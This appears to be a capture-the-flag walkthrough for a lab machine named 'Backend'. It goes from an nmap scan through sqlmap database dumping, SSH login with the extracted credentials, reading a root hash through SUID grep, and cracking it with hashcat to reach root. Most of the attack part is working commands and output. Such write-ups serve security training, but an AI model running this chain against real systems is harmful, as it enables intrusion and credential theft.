Skip to main content

Backend

export TARGET_IP=172.17.0.2
sudo nmap -p0- $TARGET_IP
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Database Enumeration

Utilize sqlmap to enumerate databases:

sqlmap -u http://172.17.0.2/login.html --forms --dbs -batch

Databases Found:

[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] users

Table Enumeration

Identify tables within the users database:

sqlmap -u http://172.17.0.2/login.html --forms -D users --tables -batch

Tables Found:

| usuarios |

Column Enumeration

List columns in the usuarios table:

sqlmap -u http://172.17.0.2/login.html --forms -D users -T usuarios --columns -batch

Columns Found:

| id       | int(11)      |
| password | varchar(255) |
| username | varchar(255) |

Data Extraction

Dump data from the usuarios table:

sqlmap -u http://172.17.0.2/login.html --forms -D users -T usuarios -C id,username,password --dump -batch

Extracted Data:

| id | username | password      |
| 1 | paco | $paco$123 |
| 2 | pepe | P123pepe3456P |
| 3 | juan | jjuuaann123 |

SSH Access

Attempt SSH login with extracted credentials:

ssh pepe@172.17.0.2

Privilege Escalation

Find SUID binaries:

find / -perm -u=s -type f 2>/dev/null

Notable SUID Binary:

/usr/bin/grep

Refer to GTFOBins for exploitation techniques.

Root Access

List files in the root directory:

ls -l /root

File Found:

-rw-r--r-- 1 root root 33 Aug 27 15:15 pass.hash

Read the hash:

grep '' /root/pass.hash

Hash:

e43833c4c9d5ac444e16bb94715a75e4

Identify the hash type:

hash-identifier e43833c4c9d5ac444e16bb94715a75e4

Possible Hash:

[+] MD5

Crack the hash using hashcat:

hashcat -m 0 -a 0 "e43833c4c9d5ac444e16bb94715a75e4" /usr/share/wordlists/rockyou.txt

Cracked Password:

spongebob34

Switch to root user:

su root # password: spongebob34
id

Root Confirmation:

uid=0(root) gid=0(root) groups=0(root)